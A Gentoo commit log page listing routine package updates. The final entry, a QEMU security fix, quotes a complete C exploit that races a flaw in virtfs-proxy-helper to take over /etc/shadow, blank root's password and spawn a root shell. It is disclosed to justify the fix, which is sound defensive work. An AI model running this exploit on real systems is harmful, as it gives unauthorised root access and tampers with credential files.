Get Gentoo!
gentoo.org sites
gentoo.org Wiki Bugs Forums Packages
Planet Archives Sources
Infra Status
summaryrefslogtreecommitdiff
Commit message (Collapse)AuthorAgeFilesLines
* sys-libs/libhugetlbfs: do not gzip manpagesMike Frysinger2015-12-141-0/+1
| | | | We'll handle compressing of files ourselves, so don't waste time on it.
* net-mail/mu: Ensure man pages are installedVikraman Choudhury2015-12-141-0/+8
| | | | | | X-Gentoo-Bug: 567424 Package-Manager: portage-2.2.24
* app-emulation/crossover-bin: Bump to 15.0.0Richard Yao2015-12-142-0/+142
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Richard Yao <ryao@gentoo.org>
* New license: CROSSOVER-3Richard Yao2015-12-141-0/+683
| | | | | | | | | | | | | | | Codeweavers made 2 changes between this and CROSSOVER-2, the latter of which we requested: 1. They now claim to bundle copies of libxml2 and libxslt under BSD-style licenses. 2. The section on deleting the software has been deleted. This had 6 days on the list for comments and none were provided: https://archives.gentoo.org/gentoo-dev/message/fd9e05bfe3401ce96dfaa9927f9ebcca Signed-off-by: Richard Yao <ryao@gentoo.org>
* sys-kernel/vanilla-sources: Automated version bump to 4.3.2 - remove old.Agostino Sarubbo2015-12-142-1/+1
| | | | | Package-Manager: portage-2.2.24 Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-php/PEAR-Mail_Mime: alpha/arm/hppa/ia64/ppc64/ppc/sparc/x86 stable, ↵Agostino Sarubbo2015-12-141-1/+1
| | | | | | | (ALLARCHES policy) wrt bug #567994 Package-Manager: portage-2.2.24 Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* sys-apps/systemd: x86 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* sys-fs/udev: x86 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* virtual/libgudev: x86 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-libs/libgudev: x86 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* sys-apps/hwids: x86 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="x86" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* sys-apps/systemd: amd64 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* sys-fs/udev: amd64 stable wrt bug #568082Agostino Sarubbo2015-12-141-1/+1
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* Merge branch 'pull-469'Ian Delaney2015-12-141-0/+47
|\ | | | | | | Pull request: https://github.com/gentoo/gentoo/pull/469
| * media-gfx/pinta: revbump to 1.6-r2, removed redundant dependenciesAlessandro Calorì2015-12-141-0/+47
| | | | | | | | | | | | | | mono-addins with "gtk" USE flag is enough to pull in every Mono library needed by Pinta Package-Manager: portage-2.2.24
* | mysql-multilib-r1.eclass: Adjust documentation comments wrt bug 568240Brian Evans2015-12-141-3/+4
| | | | | | | | Signed-off-by: Brian Evans <grknight@gentoo.org>
* | net-mail/dovecot: version bump to 2.2.21 (#568158)Eray Aslan2015-12-142-0/+310
| | | | | | | | Package-Manager: portage-2.2.26
* | dev-db/mariadb: Fix tests due to removed USE flagBrian Evans2015-12-141-7/+0
| | | | | | | | Package-Manager: portage-2.2.26
* | dev-db/percona-server: Fix tests due to removed USE flagBrian Evans2015-12-141-7/+0
| | | | | | | | Package-Manager: portage-2.2.26
* | dev-db/mysql: Fix tests with removed USE flagBrian Evans2015-12-141-7/+0
| | | | | | | | Package-Manager: portage-2.2.26
* | kde-plasma/kdeplasma-addons: Add KF 5.17 compatible 5.4.3 revbumpAndreas Sturmlechner2015-12-151-0/+67
| | | | | | | | Package-Manager: portage-2.2.24
* | kde-frameworks: version bump 5.17.0Michael Palimaka2015-12-15141-0/+2368
| | | | | | | | Package-Manager: portage-2.2.26
* | dev-db/sqlite: amd64 stable wrt bug #567998Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/pkg-config: amd64 stable wrt bug #568042Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-php/PEAR-Mail_Mime: amd64 stable wrt bug #567994Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | media-video/mkvtoolnix: amd64 stable wrt bug #562484Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | app-i18n/im-freewnn: amd64 stable wrt bug #566230Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-python/oslotest: amd64 stable wrt bug #568022Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/ruby-ldap: amd64 stable wrt bug #568110Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-libs/libnl: amd64 stable wrt bug #568052Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/ruby-opengl: amd64 stable wrt bug #568114Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | app-emulation/vice: amd64 stable wrt bug #568078Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/rdoc: amd64 stable wrt bug #568044Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | games-util/nml: amd64 stable wrt bug #568074Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | games-engines/stratagus: amd64 stable wrt bug #568076Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/narray: amd64 stable wrt bug #568040Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/ruby-openid: amd64 stable wrt bug #568118Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | app-emulation/xen: amd64 stable wrt bug #566842Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | dev-ruby/rrdtool-bindings: amd64 stable wrt bug #567586Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | net-analyzer/rrdtool: amd64 stable wrt bug #567586Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | app-text/docbook-xsl-stylesheets: amd64 stable wrt bug #568160Agostino Sarubbo2015-12-141-1/+1
| | | | | | | | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* | kde-misc/rsibreak: version bumpAndreas Sturmlechner2015-12-152-0/+45
| | | | | | | | Package-Manager: portage-2.2.26
* | media-gfx/symboleditor: version bumpAndreas Sturmlechner2015-12-152-0/+50
| | | | | | | | Package-Manager: portage-2.2.26
* | media-gfx/symboleditor: shorten DESCRIPTION to fit within 80-character guidelineMichael Palimaka2015-12-151-1/+1
| | | | | | | | Package-Manager: portage-2.2.26
* | kde-base: Add >=cmake-3.4 configure fix for KDE PIMAndreas Sturmlechner2015-12-156-2/+77
| | | | | | | | | | | | | | See also: https://bugs.gentoo.org/show_bug.cgi?id=566058 Tested-by: Vadim Package-Manager: portage-2.2.24
* | media-video/kamoso: version bumpMichael Palimaka2015-12-152-0/+34
| | | | | | | | Package-Manager: portage-2.2.26
* | www-servers/apache: Raised minimum required version of nghttp2Lars Wendler2015-12-141-1/+1
| | | | | | | | | | | | | | to version 1.2.1 as reuqested in bug #568224 Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* | app-text/docbook-xsl-stylesheets: Fixed homepage variable in ebuilds.Lars Wendler2015-12-142-2/+2
| | | | | | | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* | sys-kernel/git-sources: Linux patch 4.4_rc5Mike Pagano2015-12-142-0/+41
| | | | | | | | Package-Manager: portage-2.2.24
* | app-emulation/qemu: critical security fixJason A. Donenfeld2015-12-144-0/+2495
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | The virtfs-proxy-helper program is not a safe binary to give caps. The following exploit code demonstrates the vulnerability: ~=~=~=~= snip ~=~=~=~= /* == virtfshell == * * Some distributions make virtfs-proxy-helper from QEMU either SUID or * give it CAP_CHOWN fs capabilities. This is a terrible idea. While * virtfs-proxy-helper makes some sort of flimsy check to make sure * its socket path doesn't already exist, it is vulnerable to TOCTOU. * * This should spawn a root shell eventually on vulnerable systems. * * - zx2c4 * 2015-12-12 * * * zx2c4@thinkpad ~ $ lsb_release -i * Distributor ID: Gentoo * zx2c4@thinkpad ~ $ ./virtfshell * == Virtfshell - by zx2c4 == * [+] Beginning race loop * [+] Chown'd /etc/shadow, elevating to root * [+] Cleaning up * [+] Spawning root shell * thinkpad zx2c4 # whoami * root * */ #include <stdio.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/inotify.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> static int it_worked(void) { struct stat sbuf = { 0 }; stat("/etc/shadow", &sbuf); return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); } int main(int argc, char **argv) { int fd; pid_t pid; char uid[12], gid[12]; sprintf(uid, "%d", getuid()); sprintf(gid, "%d", getgid()); printf("== Virtfshell - by zx2c4 ==\n"); printf("[+] Beginning race loop\n"); while (!it_worked()) { fd = inotify_init(); unlink("/tmp/virtfshell/sock"); mkdir("/tmp/virtfshell", 0777); inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE); pid = fork(); if (!pid) { close(0); close(1); close(2); execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL); _exit(1); } read(fd, 0, 0); unlink("/tmp/virtfshell/sock"); symlink("/etc/shadow", "/tmp/virtfshell/sock"); close(fd); kill(pid, SIGKILL); wait(NULL); } printf("[+] Chown'd /etc/shadow, elevating to root\n"); system( "cp /etc/shadow /tmp/original_shadow;" "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;" "cat /tmp/modified_shadow > /etc/shadow;" "su -c '" " echo [+] Cleaning up;" " cat /tmp/original_shadow > /etc/shadow;" " chown root:root /etc/shadow;" " rm /tmp/modified_shadow /tmp/original_shadow;" " echo [+] Spawning root shell;" " exec /bin/bash -i" "'"); return 0; }